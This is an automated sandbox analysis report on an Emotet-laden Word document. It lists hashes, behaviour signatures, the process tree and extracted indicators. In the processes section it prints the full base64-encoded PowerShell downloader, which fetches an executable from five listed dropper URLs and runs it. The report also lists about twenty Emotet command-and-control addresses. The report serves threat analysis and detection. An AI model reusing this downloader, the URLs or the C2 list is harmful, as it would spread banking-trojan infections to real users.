Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    53s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    18-07-2020 06:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dd74f5407f6af69e17e0a780aaa83554bdce3bb6a241cc102366dc27f7f6f716.doc

  • Size

    191KB

  • MD5

    00995da2d37552833283e17aa7e7c946

  • SHA1

    02c781d3178edfc4841fb8ce47e4ea7862f8555d

  • SHA256

    dd74f5407f6af69e17e0a780aaa83554bdce3bb6a241cc102366dc27f7f6f716

  • SHA512

    56d9a2c3dbc058887815903044fc0e650f77192074660b76f8d45dfbed707cc2a70c290b2929ac32f36b9094c00fbceaba9759756036b483a87d4d090b626f2b

Score
10/10
discoverytrojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.20190607.com/wp-admin/ixyjozs/
exe.dropper

https://lovely-lollies.com/wp-admin/fgvid/
exe.dropper

https://www.angage.com/wp-content/mtincvc/
exe.dropper

https://connect-plus.co.uk/aspnet_client/3yey3rr/
exe.dropper

http://mapas.hoonicorns.pt/comp3/ly8cmti/

Extracted

Family

emotet

C2

109.117.53.230:443

212.51.142.238:8080

190.160.53.126:80

139.59.60.244:8080

91.211.88.52:7080

190.108.228.62:443

186.208.123.210:443

46.105.131.87:80

173.91.22.41:80

222.214.218.37:4143

31.31.77.83:443

62.75.141.82:80

93.156.165.186:80

93.51.50.171:8080

185.94.252.104:443

78.189.165.52:8080

95.179.229.244:8080

73.11.153.178:8080

203.153.216.189:7080

95.213.236.64:8080
rsa_pubkey.plain

Signatures

  • Modifies registry class 280 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Drops file in System32 directory 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Office loads VBA resources, possible macro or embedded object present

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\dd74f5407f6af69e17e0a780aaa83554bdce3bb6a241cc102366dc27f7f6f716.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1292
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABuAG8AdQBnAD0AJwBtAGEAdQBsAHQAbwBlAHoAdgBlAHUAawByAGkAbwB4AGIAZQB3AHgAaQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAcgBgAGkAVAB5AGAAUABgAFIATwB0AG8AYABDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAGoAYQBvAHQAaABwAGEAbwB0AGgAIAA9ACAAJwA4ADcAMAAnADsAJABsAG8AdQBxAHUAPQAnAGIAbwBvAHkAdwBlAGUAagBuAGUAYQBsAGsAZQBvAHYAJwA7ACQAZAB1AGIAawBlAG8AawBwAGkAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAagBhAG8AdABoAHAAYQBvAHQAaAArACcALgBlAHgAZQAnADsAJAB0AG8AYQB4AG4AbwBpAHIAZgBpAGUAdABzAG8AdQBuAHMAaQBxAHUAPQAnAHgAbwBlAHEAdQBuAG8AbwBsACcAOwAkAGMAdQBhAHQAaABjAGkAbwB5AD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABuAGUAdAAuAFcARQBiAEMAbABJAEUATgBUADsAJABjAGUAZQB4AHQAaABhAHUAYwBoAGgAZQBpAGYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuADIAMAAxADkAMAA2ADAANwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQB4AHkAagBvAHoAcwAvACoAaAB0AHQAcABzADoALwAvAGwAbwB2AGUAbAB5AC0AbABvAGwAbABpAGUAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZgBnAHYAaQBkAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAG4AZwBhAGcAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG0AdABpAG4AYwB2AGMALwAqAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0AC0AcABsAHUAcwAuAGMAbwAuAHUAawAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwAzAHkAZQB5ADMAcgByAC8AKgBoAHQAdABwADoALwAvAG0AYQBwAGEAcwAuAGgAbwBvAG4AaQBjAG8AcgBuAHMALgBwAHQALwBjAG8AbQBwADMALwBsAHkAOABjAG0AdABpAC8AJwAuACIAUwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABxAHUAaQBoAGoAbwB1AGYAagBlAGUAcABsAG8AbwBmAG0AZQBvAHYAPQAnAGwAbwBpAHQAaABtAGEAaQBjAGgAagBvAG8AZgBuAGEAZQB0ACcAOwBmAG8AcgBlAGEAYwBoACgAJAB5AGUAZQB5AG4AbwBvAGIAbgBpAG8AawBnAGkAbwBoAHgAdQByAHoAYQBpAHAAIABpAG4AIAAkAGMAZQBlAHgAdABoAGEAdQBjAGgAaABlAGkAZgApAHsAdAByAHkAewAkAGMAdQBhAHQAaABjAGkAbwB5AC4AIgBEAG8AVwBOAGAAbABPAGAAQQBEAEYASQBMAGUAIgAoACQAeQBlAGUAeQBuAG8AbwBiAG4AaQBvAGsAZwBpAG8AaAB4AHUAcgB6AGEAaQBwACwAIAAkAGQAdQBiAGsAZQBvAGsAcABpAHAAKQA7ACQAcgBhAGUAcQB1AGgAdQBhAHgAbABpAGEAagBqAGUAaQBrAD0AJwBtAGUAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAGQAdQBiAGsAZQBvAGsAcABpAHAAKQAuACIATABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAyADYAOAA4ADcAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAUgBlAGAAQQB0AEUAIgAoACQAZAB1AGIAawBlAG8AawBwAGkAcAApADsAJABzAGkAZQBjAGgAaQBlAHQAYwBoAHUAYQBuAGMAbwBpAGwAZABlAGUAYwBoAHQAdQBhAGMAaAA9ACcAdABoAG8AdQBuACcAOwBiAHIAZQBhAGsAOwAkAGsAdQB1AGMAcABlAGEAZABmAGUAbwBnAGQAYQBlAHoAcwBlAHUAagA9ACcAcwBhAGsAbgBpAG8AcgBnAHUAegByAGkAbwBnAG4AdQB1AHoAYwBvAHQAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABoAGUAdQBmAHIAbwBvAGsAcgBpAGEAagB0AGgAZQB1AGwAYwBpAGUAYgA9ACcAegBpAGEAcQB1AGMAbwBlAHgAdABoAGkAZQB6AG0AdQB1AGMAJwA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Drops file in System32 directory
    PID:1032
  • C:\Users\Admin\870.exe
    C:\Users\Admin\870.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    • Drops file in System32 directory
    PID:1768
    • C:\Windows\SysWOW64\kbdnecnt\dhcpcore.exe
      "C:\Windows\SysWOW64\kbdnecnt\dhcpcore.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:1156

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1156-12-0x00000000003A0000-0x00000000003AC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1292-2-0x0000000008920000-0x0000000008924000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-3-0x0000000006EC0000-0x00000000070C0000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1292-4-0x000000000B060000-0x000000000B064000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-5-0x000000000C0E0000-0x000000000C0E4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1292-6-0x0000000006EC0000-0x00000000070C0000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1768-9-0x0000000000260000-0x000000000026C000-memory.dmp

    Filesize

    48KB

    Download